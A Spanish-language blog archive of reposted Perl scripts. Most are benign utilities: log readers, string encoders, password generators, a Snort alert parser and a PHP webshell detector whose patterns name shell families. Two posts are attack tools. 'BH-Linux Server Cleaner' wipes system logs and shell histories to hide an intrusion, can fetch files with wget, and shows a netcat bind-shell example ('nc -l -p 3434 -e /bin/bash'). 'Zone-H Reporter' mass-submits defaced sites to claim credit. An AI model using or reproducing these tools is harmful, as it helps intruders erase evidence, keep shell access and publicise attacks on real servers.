Mostrando entradas con la etiqueta Perl. Mostrar todas las entradas
Mostrando entradas con la etiqueta Perl. Mostrar todas las entradas

Lastlog script for Solaris

d
Nombre: lastlog.pl
Autor: ph
Visto en: Tech Notes 
#!/usr/local/bin/perl

# month names for common usage

@months = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug',
           'Sep', 'Oct', 'Nov', 'Dec');

setpwent;
while (($name, $junk, $uid) = getpwent) {
        $names{$uid} = $name;
}
endpwent;

open(LASTL,'/var/adm/lastlog');

for ($uid = 0; read(LASTL, $record, 28); $uid++) {
    ($time, $line, $host) = unpack('l A8 A16', $record);
    next unless $time;

    $host = "($host)" if $host;
    ($sec, $min, $hour, $mday, $mon, $year) = localtime($time);

    printf "%-9s%-8s%s %2d %4d    %s\n",
        $names{$uid}, $line, $months[$mon], $mday, 1900+$year, $host;
}
Leer más...
Publicado por Unknown en 14:24 0 comentarios
Etiquetas: , , , , ,

BH-Linux Server Cleaner

d
Nombre: BH-Linux Server Cleaner
Autor: Br4v3-H34r7
Visto en Shipcode's Misadventures 
#!/usr/bin/perl
#==============================================================#
# BH-LSC 1.0 (BH-Linux Server Cleaner Version 1.0)
# Coded By: Br4v3-H34r7
# Contact: R00T[AT]Br4v3-H34r7[DOT]CoM
# Website: Br4v3-H34r7.CoM | BH2H.CoM
# License: GNU General Public License 3
#==============================================================#
# NOT FOR ILLEGAL USAGE - NOT FOR SCRIPT KIDDIES
#==============================================================#
# BEGIN THE CODE
{
 $uid = getpwuid($>); # Get User ID
 if($uid eq "root") # If root
 {
  @logs = ("/var/log/lastlog", "/var/log/messages", "/var/log/warn", "/var/log/wtmp", "/var/log/poplog", "/var/log/qmail", "/var/log/smtpd", "/var/log/telnetd", "/var/log/secure", "/var/log/auth", "/var/log/auth.log", "/var/log/cups/access_log", "/var/log/cups/error_log", "/var/log/thttpd_log", "/var/log/spooler", "/var/spool/tmp", "/var/spool/errors", "/var/spool/locks", "/var/log/nctfpd.errs", "/var/log/acct", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/log", "/usr/local/apache/logs", "/usr/local/www/logs/thttpd_log", "/var/log/news", "/var/log/news/news", "/var/log/news.all", "/var/log/news/news.all", "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice", "/var/log/news/suck.err", "/var/log/news/suck.notice", "/var/log/xferlog", "/var/log/proftpd/xferlog.legacy", "/var/log/proftpd.xferlog", "/var/log/proftpd.access_log", "/var/log/httpd/error_log", "/var/log/httpsd/ssl_log", "/var/log/httpsd/ssl.access_log", "/var/adm", "/var/run/utmp", "/etc/wtmp", "/etc/utmp", "/etc/mail/access", "/var/log/mail/info.log", "/var/log/mail/errors.log", "/var/log/httpd/*_log", "/var/log/ncftpd/misclog.txt", "/var/account/pacct", "/var/log/snort", "/var/log/bandwidth", "/var/log/explanations", "/var/log/syslog", "/var/log/user.log", "/var/log/daemons/info.log", "/var/log/daemons/warnings.log", "/var/log/daemons/errors.log", "/etc/httpd/logs/error_log", "/etc/httpd/logs/*_log", "/var/log/mysqld/mysqld.log"); # Logs Locations
  @shells_history = ("/root/.ksh_history", "/root/.bash_history", "/root/.sh_history", "/root/.history", "/root/*_history", "/root/.login", "/root/.logout", "/root/.bash_logut", "/root/.Xauthority"); # Shells History Locations
  if(@ARGV eq 0)
  {
   print "\n\t+--------------------------+\n";
   print "\t|        BH-LSC 1.0        |\n";
   print "\t|   Coded By Br4v3-H34r7   |\n";
   print "\t| Br4v3-H34r7.CoM|BH2H.CoM |\n";
   print "\t+--------------------------+\n\n";
   
   print "[*] FastMode Usage: perl $0 [Seconds] [Command(s)]\n";
   print "[*] EXAMPLE: perl $0 30 \"nc -l -p 3434 -e /bin/bash\"\n\n";
   
   print "[+] Start Clean The Server? (Y/N): ";
   chomp($Clean = ); # Get The Answer
   $LClean = "\L$Clean"; # Make User Input Lowercase Character
    if($LClean eq "y") # Answer Yes
    {
     print "[+] Clean The Server After You Exit? (Y/N): ";
     chomp($AfterExit = ); # Get The Answer
     $LAfterExit = "\L$AfterExit"; # Make User Input Lowercase Character
     if($LAfterExit eq "y") # Answer Yes
     {
      print "[+] After How Many Time? (Seconds): ";
      chomp($Seconds = ); # Get The Seconds
      
      print "[+] Run Custom Command After Cleaning The Logs? (Y/N): ";
      chomp($RunAfter = ); # Get The Answer
      $LRunAfter = "\L$RunAfter"; # Make User Input Lowercase Character
       if ($LRunAfter eq "y") # Answer Yes
       {
        print "    (1) Make This Tool Remove It Self\n";
        print "    (2) Delete Custom File From The Server\n";
        print "    (3) Get File To The Server (Using \"wget\")\n";
        print "    (4) Don't Allow Any Server Connections (Using \"iptables\" Firewall)\n";
        print "    (5) Use Other Or Multi Commands (Use \";\" Between The Commands)\n";
        
        print "[+] Enter The Number Of Your Choice: ";
        chomp($theanswer = ); # Get The Answer
         if($theanswer eq 1) # Make This Tool Remove It Self
         {
          use Cwd qw(realpath);
          $toolpath = realpath($0); # Get The Tool Name
          $command = ("rm -rf \"$toolpath\""); # Set After Exit Command
         } 
         elsif($theanswer eq 2) # Delete Custom File From The Server
         {
          print "[+] Enter File Location: ";
          chomp($file = ); # Get File Location
          $command = ("rm -rf \"$file\""); # Set After Exit Command
         }
         elsif($theanswer eq 3) # Get File To The Server
         {
          print "[+] Enter File URL: ";
          chomp($wget_url = ); # Get File URL
          print "[+] Enter Save Location: ";
          chomp($wget_location = ); # Get Save Location
          $command = ("wget -O $wget_location $wget_url"); # Set After Exit Command
         }
         elsif($theanswer eq 4) # Don't Allow Any Server Connections
         {
          print "[+] DANGEROUS This Choice Will Make The Server Drop INPUT/OUTPUT/FORWARD Connections (Y/N): ";
          chomp($answer5 = ); # Get The Answer
          $Lanswer5 = "\L$answer5"; # Make User Input Lowercase Character
           if ($Lanswer5 eq "y") # Answer Yes
           {
            $command = ("/sbin/iptables -F;/sbin/iptables -P INPUT DROP;/sbin/iptables -P OUTPUT DROP;/sbin/iptables -P FORWARD DROP"); # Set After Exit Command
           }
           else # Error Input
           {
            print "[!] Error: Wrong Input... Skipped!\n";
           }
         } 
         elsif($theanswer eq 5) # Use Other Or Multi Commands
         {
          print "[+] Enter The Command(s): ";
          chomp($command = ); # Set After Exit Command
         }
         else # Error Input
         {
          print "[!] Error: Wrong Input... Skipped!\n";
         } 
       }
       elsif($LRunAfter eq "n") # Answer No
       {
        print "[-] Answer No, Run Custom Command After Cleaning The Logs... Skipped!\n";
       }
       else # Error Input
       {
        print "[!] Error: Wrong Input... Skipped!\n";
       }
       print "[+] You Have \"$Seconds\" Seconds To Exit The Server\n";
       sleep $Seconds; # Wait For Some Seconds
     } 
     elsif($LAfterExit eq "n") # Answer No
     {
      print "[-] Answer No, Delete Server Logs After Exit... Skipped!\n";
     }
     else # Error Input
     {
      print "[!] Error: Wrong Input... Skipped!\n";
     }
      print "[+] Start Cleaning The Server...\n";
      sleep 2; # Wait For 2 Seconds
      
      unlink @logs; # Deleting System Logs
      print "[+] Server Logs Deleted Successfully\n";
      sleep 2; # Wait For 2 Seconds
      
      unlink @shells_history; # Deleting Shells History
      print "[+] Shells History Deleted Successfully\n\n";
      
      system $command; # Run The Command
    }
    elsif($LClean eq "n") # Answer No
    {
     print "[-] Answer No, Exit With Out Cleaning... Exit!\n";
    }
    else # Error Input
    {
     print "[!] Error: Wrong Input... Exit!\n";
    }
  }
  else # FastMode
  {
   sleep $ARGV[0]; # Wait For Some Seconds
   unlink @logs; # Deleting System Logs
   unlink @shells_history; # Deleting Shells History
   system $ARGV[1]; # Run The Command(s)
  }
 }
 else # If Not root
 {
  print "[!] Error: You Must Be Server \"root\" To Use This Tool... Exit!\n";
 }
} 
# END THE CODE
#==============================================================#
Leer más...
Publicado por Snifer en 10:00 0 comentarios
Etiquetas: , , , , , , ,

ListaModulos.pl

d
Nombre: ListaModulos.pl
Autor: Desconocido
Visto en: davioth
#!/usr/bin/perl
use strict;
use ExtUtils::Installed;

my $instmod = ExtUtils::Installed->new();

foreach my $module ($instmod->modules()) {
      my $version = $instmod->version($module) || "???";
      print "$module $version\n";
}
Leer más...
Publicado por Unknown en 10:00 0 comentarios
Etiquetas: , , , , , , ,

Convertstr.pl -Reverses and converts a string

d
Autor: Dual
Descripción: Reverses and converts a string to base64, binary, hex, and rot13 and provides  the md5, sha1 and sha256 hashes 
Nombre: convertstr.pl

 
#!/usr/bin/env perl -w

# convertstr.pl - Reverses and converts a string
# to base64, binary, hex, and rot13 and provides
# the md5, sha1 and sha256 hashes 
#
# by dual

use strict;
use MIME::Base64;
use Digest::MD5;
use Digest::SHA qw(sha1_hex sha256_hex);

my $usage = "convertstr.pl - Reverses and converts a string
to base64, binary, hex and rot13, and provides
the md5, sha1 and sha256 hashes
Usasge: perl convertstr.pl 
";

# Get and check args
print $usage and exit unless my $string = shift;
chomp($string);

# Print header
print "Converting \'$string\'...\n\n";

# Reverse
print "REVERSED:\n";
my $reversed = reverse($string);
print $reversed . "\n\n";

# Base64
print "BASE64:\n";
my $base64 = encode_base64($string);
chomp($base64);
print $base64 . "\n\n";

# Binary
print "BINARY:\n";
my $binary = unpack('B*', $string);
print $binary . "\n\n";

# Hex
print "HEX:\n";
my $hex = unpack('H*', $string);
print $hex . "\n\n";

# Rot13
print "ROT13:\n";
if ($string =~ /[^A-Za-z\s]/) {
  print ">>> String must be alphabetic\n\n";
}
else {
  my $rot13 = $string;
  $rot13 =~ tr/A-Za-z/N-ZA-Mn-za-m/;
  print $rot13 . "\n\n";
}

# MD5
print "MD5:\n";
my $md5 = Digest::MD5->new;
$md5->add($string);
my $md5hex = $md5->hexdigest;
print $md5hex . "\n\n";

# SHA1
print "SHA1:\n";
my $sha1hex = sha1_hex($string);
print $sha1hex . "\n\n";

# SHA256
print "SHA256:\n";
my $sha256hex = sha256_hex($string);
print $sha256hex . "\n\n";

# Close out
print "Done.\n"
Leer más...
Publicado por Snifer en 7:55 0 comentarios
Etiquetas: , , , , ,

Base64pl.pl Encode/Decode

d
Autor: Dual
Descripción: Encode / Decode strings usando base64
Nombre: base64pl.pl 

#!/usr/bin/env perl -w

# base64pl.pl - Encodes/decodes string(s) using base64
# by dual

use strict;
use MIME::Base64;

my $opt;
my $usage = "base64pl.pl -
Encodes or decodes a string using base64
Usage: perl base64pl.pl <-e data-blogger-escaped-d="d"> 
-e => encode
-d => decode
";

print $usage and exit unless (defined($opt = shift) && $opt =~ /^(-e|-d)$/);
print $usage and exit unless ($#ARGV > -1);

if ($opt =~ /e/) {
  my $enc_ref = \&encode;
  for my $enc_str (@ARGV) {
    $enc_ref->($enc_str);
  }
}
else {
  my $dec_ref = \&decode;
  for my $dec_str (@ARGV) {
    $dec_ref->($dec_str);
  }
} 

sub encode {
  my $string = $_[0];
  my $encoded = encode_base64($string);
  chomp($encoded);
  print "$string: $encoded\n";
}

sub decode {
  my $string = $_[0];
  my $decoded = decode_base64($string);
  chomp($decoded);
  print "$string: $decoded\n";
}

Fuente
Leer más...
Publicado por Snifer en 7:51 0 comentarios
Etiquetas: , , , , , ,

Zone-H Reporter Perl

d
Autor: PrinceofHacking Descripción: Script realizado en Perl que nos permite interactuar con ZOne-H para reportar. 


#!/usr/bin/perl
 
#####################################
#                Zone-H Notify                                          #                                 
#####################################
 
############
use LWP::UserAgent;
############
system('cls');
system ('title Powered By PrinceofHacking');
############
 
print "                         #####################\n   ";
print "                      #    Zone-Notify    #\n  ";
print "                       #        USO        #\n  ";
print "                       # [1] Single Deface #\n";
print "                         # [2] Mass   Deface #\n";
print "                         # [3] Help & About  #\n";
print "                         #####################\n\n   ";
 
$pick=;
if ($pick>3) {
print "Unknown Command\n";
}
if ($pick ==1)
{
 
print "Mode : Single Deface\n\n";
print "Defacer [Nickname] :\n";
$Def=;
print "Dominio:\n";
$Dom=;
if ($Dom =~ /http:\/\//)
{
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $Dom,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1";
}
else
{
print "Error\n";
}
}
else
{
$new="http://" . "$Dom";
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $new,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1";
}
else
{
print "Error\n";
}
}
}
#############################################Mass###########################################
if ($pick == 2){
print "Mode : Mass Deface\n\n";
open(site,"owned.txt");
 
@ARRAY=;
 
close site;
print "Defacer [Nickname] :\n";
$Def=;
foreach $mass(@ARRAY){
if ($mass !~ /http:/) {
$mass='http://' . $mass;
}
print "$mass\n";
 
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $mass,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1\n\n";
}
else
{
print "Error\n";
}
}
}
#####################About##############
if ($pick ==3)
{
print "Para la opcion [2] crear un texto con las paginas y guardarlo como : owned.txt\n";
print "Example\n";
print "http://link.com\n";
print "http://link2.com\n";
print "http://link3.com\n\n";
}
Leer más...
Publicado por Snifer en 5:00 0 comentarios
Etiquetas: , ,

show_tech-support.pl

d
Nombre: show_tech-support.pl
Autor: @Tonejito
Descripción: Script que recoje información de un sistema Debian GNU/Linux para soporte técnico 
#!/usr/bin/perl
#	= ^ . ^ =
#	show_tech-support.pl
#	Show technical support about a Debian GNU/Linux System
#
#	This script is released under the BSD license
#
#	Copyright (c) 2012, Andrés Hernández (Tonejito)
#	All rights reserved.
#	
# Redistribution and use in source and binary forms, with or without 
# modification, are permitted provided that the following conditions are met:
#	
#	1. Redistributions of source code must retain the above copyright 
#	notice, this list of conditions and the following disclaimer.
#
#	2. Redistributions in binary form must reproduce the above copyright 
#	notice, this list of conditions and the following disclaimer in the 
#	documentation and/or other materials provided with the distribution.
#
#	3. Neither the name of the project nor the names of its contributors 
#	may be used to endorse or promote products derived from this software 
#	without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
# POSSIBILITY OF SUCH DAMAGE.

use strict;
use warnings;

package ssi;

my $PREFIX="[${0}	";
my $SUFFIX="]\n";

my $PADDING="#-------#-------#-------#-------#-------#-------#-------#-------#-------#-------";

my @tests =
(
	{
		CMD  => "env"
	} ,
	{
		CMD  => "hostname"
	} ,
	{
		CMD  => "hostname",
		ARGS => "-f"
	} ,
	{
		CMD  => "cat",
		ARGS => "/proc/version"
	} ,
	{
		CMD  => "uname",
		ARGS => "-a"
	} ,
	{
		CMD  => "lsb_release",
		ARGS => "-a"
	} ,
	{
		CMD  => "ulimit",
		ARGS => "-a"
	} ,
	{
		CMD  => "cat",
		ARGS => "/etc/fstab"
	} ,
	{
		CMD  => "mount"
	} ,
	{
		CMD  => "df",
		ARGS => "-m"
	} ,
	{
		CMD  => "ls",
		ARGS => "-l /lib*/libc-*.so /lib*/libc.so*"
	} ,
	{
		CMD  => "lsmod"
	} ,
	{
		CMD  => "free",
		ARGS => "-m"
	} ,
	{
		CMD  => "cat",
		ARGS => "/proc/cpuinfo"
	} ,
	{
		CMD  => "cat",
		ARGS => "/proc/meminfo"
	} ,
	{
		CMD  => "cat",
		ARGS => "/proc/swaps"
	} ,
	{
		CMD  => "cat",
		ARGS => "/etc/network/interfaces"
	} ,
	{
		CMD  => "cat",
		ARGS => "/etc/resolv.conf"
	} ,
	{
		CMD  => "nm-tool",
	} ,
	{
		CMD  => "ifconfig",
		ARGS => "-a"
	} ,
	{
		CMD  => "ip",
		ARGS => "addr"
	} ,
	{
		CMD  => "route",
		ARGS => "-n -A inet"
	} ,
	{
		CMD  => "route",
		ARGS => "-n -A inet6"
	} ,
	{
		CMD  => "netstat",
		ARGS => "-ntulp"
	} ,
	{
		CMD  => "netstat",
		ARGS => "-natuplw"
	} ,
	{
		CMD  => "iptables",
		ARGS => "-nL"
	} ,
	{
		CMD  => "ip6tables",
		ARGS => "-nL"
	} ,
	{
		CMD  => "getent",
		ARGS => "passwd"
	} ,
	{
		CMD  => "getent",
		ARGS => "group"
	} ,
	{
		CMD  => "ps",
		ARGS => "afx"
	} ,
	{
		CMD  => "find",
		ARGS => "/var/spool/cron -type f -ls -exec /bin/cat {} \\;"
	} ,
	{
		CMD  => "find",
		ARGS => "/etc/rc.d/* /etc/rc.d/rc?.d/* /etc/rc?.d/* /etc/rc.local -ls"
	} ,
	{
		CMD  => "sysctl",
		ARGS => "-a"
	} ,
	{
		CMD  => "cat",
		ARGS => "/etc/apt/sources.list /etc/apt/sources.list.d/*"
	} ,
	{
		CMD  => "dpkg",
		ARGS => "--list"
	} ,
	{
		CMD  => "dpkg",
		ARGS => "--get-selections"
	} ,
	{
		CMD  => "lshw"
	} ,
);

print "# ${0}\n";

for my $test ( @tests )
{
	if (exists $test->{CMD})
	{
		# Get full path of the program
		my $CMD = $test->{CMD};
		my $WHICH = `which $CMD`;
		my $STATUS = $?;
		chomp ($CMD = $WHICH) if (!$STATUS);
		
		# bail out
		next if ($WHICH eq "");

		# concatenate arguments if present
		$CMD .= " ".$test->{ARGS} if (exists $test->{ARGS});

		# Execute program
		my $OUTPUT = `$CMD`;
		$STATUS = $?;
		print "$PADDING\n";
		print "# $CMD\n";
		print "#\t$STATUS\n"; 
		print "$OUTPUT";

		# Clean up
		$CMD = $WHICH = $STATUS = $OUTPUT = undef;
	}
}
Leer más...
Publicado por Unknown en 10:00 0 comentarios
Etiquetas: , , ,

RandomPasswordGenerator.pl

d
Nombre: RandomPasswordGenerator.pl
Autor: Attack Vector
Descripción: Script que permite crear passwords aleatorios.
Visto en Perl Code 
#!/usr/bin/perl
srand(time() ^ ($$ + $$ << 21));

if($ARGV[0] eq "") {
        print "You must enter the number of passwords you want created.\n";
        exit(0);
}
$howMany = $ARGV[0] - 1;

$siz = 7;
$siz = 3 if ($siz < 3);

$addConsonants = 1;
$firstUpper = 1;
$mixedCase = 0;
$symbolOdds = 7;
$across = 0;

$sym = "~`!@#$%^&*()-_+=,.<>";
$numb = "12345678901234567890" . $sym;
$lnumb = length($numb);
$upr = "BCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz";
$cons = "bcdfghjklmnpqrstvwxyz";

if ($mixedCase) {
    $vowel = "AEIOUaeiou";
    $cons = $upr;
} else {
    $vowel = "aeiou";
}
$upr = $cons unless ($firstUpper);
$lvowel = length($vowel);
$lcons = length($cons);
$lupr = length($upr);

$realSize = $siz;
$realSize += 2 if ($addConsonants);
($across) ? ($down = "  ") : ($down = "\n");
$linelen = 0;

for ($j=0; $j<=$howMany; $j++) {
   $pass = "";
   $k = 0;
   for ($i=0; $i<=$siz; $i++) {
      if ($i==0 or $i==2 or $i==5 or $i==7) {
         if ($i==0 or $i==5) {
            $pass .= substr($upr,int(rand($lupr)),1);
         } else {
            $pass .= substr($cons,int(rand($lcons)),1);
         }
         if ($addConsonants and (int(rand(4)) == 3) and $k < 2) {
            $pass .= substr($cons,int(rand($lcons)),1);
            $k++;
         }
      }

      if ($i > 7) {
          if (int(rand(26)) <= 5) {
             $pass .= substr($vowel,int(rand($lvowel)),1);
          } else {
             $pass .= substr($cons,int(rand($lcons)),1);
          }
      }

      $pass .= substr($vowel,int(rand($lvowel)),1)
         if ($i==1 or $i==6);

      if ($i==3 or $i==4) {
         if ($symbolOdds) {
            $pass .= substr($numb,int(rand($lnumb)),1)
               if (int(rand(10)) <= $symbolOdds);
         } else {
            $n = "";
            until ($n =~ /[0-9]/) {
               $n = substr($numb,int(rand($lnumb)),1);
            }
            $pass .= $n;
         }
      }
   }

   $skipThisOne = 0;
   $skipThisOne = 1 if ($pass =~ /[~`!@#$%^&*()\-_+=,.<>]{2}/);
   $skipThisOne = 1 unless ($pass =~ /[0-9]/);
   $skipThisOne = 1 unless ($pass =~ /[a-z]/);
   $skipThisOne = 1
      if (!($pass =~ /[A-Z]/) and ($firstUpper or $mixedCase));
   if ($skipThisOne) {
      $j--;
      next;
   }
   $pass = substr($pass,0,$realSize) if (length($pass) > $realSize);

   if ($down ne "\n") {
      if ($linelen + length($pass) + length($down) > 79) {
         print "\n";
         $linelen = 0;
      }
      $linelen += length($pass) + length($down);
   }
   print "$pass$down";

}
print "\n" if $down ne "\n";
Leer más...
Publicado por Unknown en 10:00 0 comentarios
Etiquetas: , , , ,

Snort alert log parser

d
Nombre: snort-alert.pl
Autor: Attack Vector
Descripción: Script que permite visualizar cuántas alertas detectó snort por cada evento.
Visto en Perl Code 
#!/usr/bin/perl -w

use strict;

#[**] [1:2925:3] INFO web bug 0x0 gif attempt [**]
my %h = ();
sub desc {
   $h{$b} <=> $h{$a};
}

open(F, "/var/log/snort/alert") || die "$!";
while() {
        if(/^.*?\]\s+(.*?)\s+\[.*/) {
                $h{$1}++;
        }
}

foreach my $line (sort desc (keys (%h))) {
        print "Attack: $line - Hits: $h{$line}\n";
}

close(F);

exit 0


Permisos: chmod 700 snort-alert.pl 

Ejecución ./snort-alert
Leer más...
Publicado por Unknown en 10:00 0 comentarios
Etiquetas: , , , ,

findshell.pl

d
Nombre: findshell.pl
Autor: traps.darkmindz.com
Descripción: Script que permite detectar shells php
Hace uso del módulo File::Find
Visto en: ketan.lithiumfox.com 
#!/usr/bin/perl -w
# findshell v1.0 == code taken/modified from traps.darkmindz.com
#usage: ./findshell.pl [ sensitivity 1-50 ] [ directory to scan ]
use strict;
use File::Find;
my $sens = shift  || 10;
my $folder = shift || './';
find(\&backdoor, "$folder");
sub backdoor {
    if ((/\.(php|txt)/)){
       open (my $IN,"<$_") || die "can not open datei $File::Find::name: $!";
       my @file =  <$IN>;
       #maybe evil stuffs
       my $score = grep (/function_exists\(|phpinfo\(|safe_?mode|shell_exec\(|popen\(|passthru\(|system\(|myshellexec\(|exec\(|getpwuid\(|getgrgid  \(|fileperms\(/i,@file);
       #probably evil stuffs
       my $tempscore = grep(/\`\$\_(post|request|get).{0,20}\`|(include|require|eval|system|passthru|shell_exec).{0,10}\$\_(post|request|get)|eval.{0,10}base64_decode|back_connect|backdoor|r57|PHPJackal|PhpSpy|GiX|Fx29SheLL|w4ck1ng|milw0rm|PhpShell|k1r4|FeeLCoMz|FaTaLisTiCz|Ve_cENxShell|UnixOn|C99madShell|Spamfordz|Locus7s|c100|c99|x2300|cgitelnet|webadmin|cybershell|STUNSHELL|Pr!v8|PHPShell|KaMeLeOn|S4T|oRb|tryag|sniper|noexecshell|\/etc\/passwd|revengans/i, @file);
       $score +=  50 *  $tempscore;
       print "$score - Possible backdoor : $File::Find::name\n" if ($score > $sens-1 );
       close $IN;
  }elsif((/\.(jpg|jpeg|gif|png|tar|zip|gz|rar|pdf)/)){
       open (my $IN,"<$_") || (print "can not open datei $File::Find::name: $!" && next);
       print "5000 - Possible backdoor (php in non-php file): $File::Find::name\n" if grep /(\<\?php|include(\ |\())/i, <$IN>;
       close $IN;
  }
}

Permisos: chmod 700 findshell.pl 

Ejecución: ./findhsell.pl [ sensibilidad del escaneo 1-50 ] [ directorio a escanear ]
Leer más...
Publicado por Unknown en 10:00 0 comentarios
Etiquetas: , , , , , , ,

Generador de Passwords

d
Nombre: Password.pl
Autor: George Shaffer [ gshaffe[at]erols.com ]
Descripción: Script que genera claves seguras de usuario, fáciles de recordar pero difíciles de romper
Visto en Roth Consulting 
#!/usr/bin/perl -w
# Copyright 2000 George Shaffer (gshaffer@erols.com)
# Anyone may use or modify this code for any purpose PROVIDED
# that as long as it is recognizably derived from this code,
# that the copyright notice, this comment and the immediately
# following comments on passwords remain intact and unchanged.
# No warrantees of any kind are expressed or implied.

# Please feel free to change anything from this point forward.

# I experimented at considerable length to find seed logic that
# was very random on Windows NT which generates a very small
# universe of process ID numbers ($$) compared to Unix.  
srand(time() ^ ($$ + $$ << 21));

# USER CHANGEABLE CONSTANTS FOLLOW

# Change $howMany to change the number of generated passwords.
$howMany = 10;

# Increase the default 7 to change the generated password size
# and extra letters will be added to the end.  Decrease and
# you'll lose some or all of the second string of letters.
# Depending on the value of $addConsonants the actual 
# password length may range from $siz to $siz + 2.
# Size interacts with other choices.  If $addConsonants is false
# size will be fixed length and is achieved by truncation after
# checking for upper case and digits so short sizes (3 - 5) may
# not have the variability you desire.
$siz = 7;
# A $siz less than 3 creates an endless loop.
$siz = 3 if ($siz < 3);

# Change $addConsonats to 0 to prevent some extra consonants
# from being tacked on to letter sequences.  Leave $addConsonants
# at 1 to sometimes add an extra consonant to letter sequences.
# If left at 1 the password size will vary from $siz to $siz+2.
$addConsonants = 1;

# Change $firstUpper to 0 to prevent the first character of each
# letter sequence from being upper case.  Leave it as 1 if you
# want some of the first characters to be upper case.
$firstUpper = 1;

# Change $mixedCase to 1 to mix the case of all letters.
# $mixedCase is not random as subsequent checks force at
# least one upper and one lower case letter in each password.
# Leave it at 0 so all letters will be lower case or only
# the first or each letter sequence may  be upper case.
$mixedCase = 0;

# By changing $symbolOdds from 0 to 10 you change the likelihood
# of having two numbers or a number and a symbol.  At 0 you will
# always get 2 digits.  At 1 you will usually only get one digit
# but will sometimes get a second digit or a symbol.  At 10 you 
# will always get two numbers or a number and a symbol with the 
# about even chances that one of the two characters will be a 
# symbol.  The odds are affected by what characters are added to 
# or removed from the $sym initialization string.  
# The default is 7.
$symbolOdds = 7;

# Change $across to a 1 to print passwords across the screen.
# Leave $across as a 0 to print a single column down the screen. 
$across = 0;

# Add or remove symbols to make passwords easier or harder
# to type.  Delete the second set of digits to increase
# the relative frequency of symbols and punctuation.
# Add some vowels or consonants to really change the patterns
# but these will also get much harder to remember.
# If you change the symbol list you need to change the matching
# regular expression near the bottom of the program.
$sym = "~`!@#$%^&*()-_+=,.<>";
$numb = "12345678901234567890" . $sym;
$lnumb = length($numb);


# USER CHANGEABLE CONSTANTS END - Changing the constants as
# specified above has been fairly well tested.  Any changes
# below here and you are changing the logic of the program.
# You should be familiar with programming if you make changes
# after this point.

# Unless you plan to change the logic in the loop below,
# leave this next alone and control case with $firstUpper and
# $mixedCase above.  $mixedCase supercedes if both are true.
$upr = "BCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz";
$cons = "bcdfghjklmnpqrstvwxyz";
if ($mixedCase) {
    $vowel = "AEIOUaeiou";
    $cons = $upr;
} else {
    $vowel = "aeiou";
}
$upr = $cons unless ($firstUpper);
$lvowel = length($vowel);
$lcons = length($cons);
$lupr = length($upr);

$realSize = $siz;
$realSize += 2 if ($addConsonants);
($across) ? ($down = "  ") : ($down = "\n");
$linelen = 0;

for ($j=0; $j<=$howMany; $j++) {
   $pass = "";
   $k = 0;
   for ($i=0; $i<=$siz; $i++) {
      # The basic password structure is cvc99cvc.  Depending on
      # how $cons and $upr have been initialized above case will
      # be all lower, first upper or random.
      if ($i==0 or $i==2 or $i==5 or $i==7) {
         if ($i==0 or $i==5) {
            $pass .= substr($upr,int(rand($lupr)),1);
         } else {
            $pass .= substr($cons,int(rand($lcons)),1);
         }
         # The next will conditionally add up to 2 consonants
         # pseudo randomly after the four "standard" consonants.
         if ($addConsonants and (int(rand(4)) == 3) and $k < 2) {
            $pass .= substr($cons,int(rand($lcons)),1);
            $k++;
         }
      }

      # Pad the password with letters if $siz is over 7.
      if ($i > 7) {
          if (int(rand(26)) <= 5) {
             $pass .= substr($vowel,int(rand($lvowel)),1);
          } else {
             $pass .= substr($cons,int(rand($lcons)),1);
          }
      }

      # Put the vowels in cvc99cvc.  Case depends on how $vowel
      # was initialized above.
      $pass .= substr($vowel,int(rand($lvowel)),1) 
         if ($i==1 or $i==6);

      # Change $symbolOdds initialization above to affect the
      # number of numbers and symbols and their ratio.
      if ($i==3 or $i==4) {
         # If $symbolOdds is non zero take any character
         # from the $numb string which has digits, symbols
         # and punctuation.
         if ($symbolOdds) {
            $pass .= substr($numb,int(rand($lnumb)),1) 
               if (int(rand(10)) <= $symbolOdds);
         } else {
            # If $symbolOdds is zero keep trying until a
            # a digit is found.
            $n = "";
            until ($n =~ /[0-9]/) {
               $n = substr($numb,int(rand($lnumb)),1);
            }
            $pass .= $n;
         }
      }
   }

   # Plan to use this password unless . . .
   $skipThisOne = 0;
   # Don't include two consecutive symbols or puntuation.
   $skipThisOne = 1 if ($pass =~ /[~`!@#$%^&*()\-_+=,.<>]{2}/);
   # Include at least one digit.
   $skipThisOne = 1 unless ($pass =~ /[0-9]/);
   # Include at least one lower case letter.
   $skipThisOne = 1 unless ($pass =~ /[a-z]/);
   # Conditionally insure at least one upper case character.
